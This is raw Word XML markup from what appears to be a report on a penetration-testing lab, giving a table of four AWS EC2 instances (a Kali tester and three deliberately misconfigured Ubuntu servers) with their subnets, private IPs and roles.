    <w:p w14:paraId="6B904D8F" w14:textId="15287F0C" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The following table provides an overview of the instance configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9739F5" w14:textId="7DB0F76C" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="006F3B1E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Table 4.1A: EC2 Instance Configuration Summary</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1415"/>
        <w:gridCol w:w="1415"/>
        <w:gridCol w:w="1415"/>
        <w:gridCol w:w="1416"/>
        <w:gridCol w:w="1416"/>
        <w:gridCol w:w="1416"/>
      </w:tblGrid>
      <w:tr w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w14:paraId="3062F500" w14:textId="77777777" w:rsidTr="006F3B1E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F16913F" w14:textId="63B3D29E"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Instance Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FCF0D01" w14:textId="6E9F8C9D"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Subnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5532C796" w14:textId="2D33ACF6"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Private IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1416" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="181FB8BC" w14:textId="770E540C"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Instance Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1416" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13FEC5B6" w14:textId="62936191"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Operating System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1416" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FF3A08C" w14:textId="76E163F6"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Primary Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w14:paraId="0C5030C9" w14:textId="77777777" w:rsidTr="006F3B1E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F5DC82E" w14:textId="1F957532"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Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BD57BFB" w14:textId="0EB4366D"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Subnet_1 (10.0.1.0/24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38021BE8" w14:textId="65118049" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="006F3B1E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.0.1.158</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1416" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43F57750" w14:textId="4E438BCA" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="00313C28">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId11" w:anchor="InstanceTypes:instanceType=t2.micro" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>t</w:t>
              </w:r>
              <w:proofErr w:type="gramStart"/>
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>2.micro</w:t>
              </w:r>
              <w:proofErr w:type="gramEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1416" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AEEFE59" w14:textId="57A5E31D" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="00313C28">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ubuntu-noble-24.04-amd64-server-20250821</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1416" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DA05E57" w14:textId="75EC8CE9" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="006F3B1E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tester machine equipped with the required tools.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w14:paraId="635F44E7" w14:textId="77777777" w:rsidTr="006F3B1E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="734F2ED1" w14:textId="77777777" w:rsidR="00313C28" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="00313C28">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VulnWeb</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B6C4830" w14:textId="77777777" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="006F3B1E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="041A49FC" w14:textId="66BEF9F2"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Subnet_2 (10.0.2.0/24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F94F56D" w14:textId="300B0D3D" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="006F3B1E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.0.2.178</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1416" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10984F3C" w14:textId="0AA43B46" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="00313C28">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId12" w:anchor="InstanceTypes:instanceType=t2.micro" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>t</w:t>
              </w:r>
              <w:proofErr w:type="gramStart"/>
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>2.micro</w:t>
              </w:r>
              <w:proofErr w:type="gramEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1416" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E24755B" w14:textId="1B117EAD" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="00313C28">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ubuntu-noble-24.04-amd64-server-20250821</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1416" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17B7059E" w14:textId="705E180A" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="00313C28">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Application server with misconfigurations allowing privilege escalation on Linux.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w14:paraId="2AB0F740" w14:textId="77777777" w:rsidTr="006F3B1E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="455CB9DA" w14:textId="77777777" w:rsidR="00313C28" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="00313C28">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ServerMeta</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58E34F32" w14:textId="77777777" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="006F3B1E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="236225FB" w14:textId="2C44203F"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Subnet_3 (10.0.3.0/24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0757C87B" w14:textId="52604B22" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="00313C28">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.0.3.190</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1416" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DB2D64C" w14:textId="295F0E40" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="00313C28">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId13" w:anchor="InstanceTypes:instanceType=t2.micro" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>t</w:t>
              </w:r>
              <w:proofErr w:type="gramStart"/>
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>2.micro</w:t>
              </w:r>
              <w:proofErr w:type="gramEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1416" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60D4039D" w14:textId="2301FFC3" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="00313C28">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ubuntu-noble-24.04-amd64-server-20250821</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1416" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="409B8E5A" w14:textId="2F09D387" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="006F3B1E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Application server with web-application-level vulnerabilities enabling pivoting.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w14:paraId="5A927D46" w14:textId="77777777" w:rsidTr="006F3B1E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D2BC4DB" w14:textId="77777777" w:rsidR="00313C28" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="00313C28">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SecretMachine</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D72032B" w14:textId="77777777" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="006F3B1E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69F030C8" w14:textId="6754A608" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="006F3B1E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Subnet_4 (10.0.4.0/24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E8C5048" w14:textId="6A4A0D21" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="006F3B1E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.0.4.141</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1416" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27F0BC04" w14:textId="49568268" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="00313C28">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId14" w:anchor="InstanceTypes:instanceType=t2.micro" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>t</w:t>
              </w:r>
              <w:proofErr w:type="gramStart"/>
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>2.micro</w:t>
              </w:r>
              <w:proofErr w:type="gramEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1416" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5969A178" w14:textId="1AF734AA" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="00313C28">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ubuntu-noble-24.04-amd64-server-20250821</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1416" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44646564" w14:textId="5353CAA5" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="006F3B1E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">An isolated machine on </w:t>
            </w:r>
            <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ubnet 4 with access limited to machines in </w:t>
            </w:r>
            <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ubnet 3.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BBC9266" w14:textId="77777777" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05974A88" w14:textId="77777777" w:rsidR="00313C28" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Each instance was configured with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18130A11" w14:textId="60380CBA" w:rsidR="00313C28" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="00024908">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Operating System: Linux-based distributions (ubuntu-noble-24.04-amd64-server-20250821)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE4A766" w14:textId="1930F08E" w:rsidR="00313C28" w:rsidRPr="00D77DFE" w:rsidRDefault="00313C28" w:rsidP="00024908">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
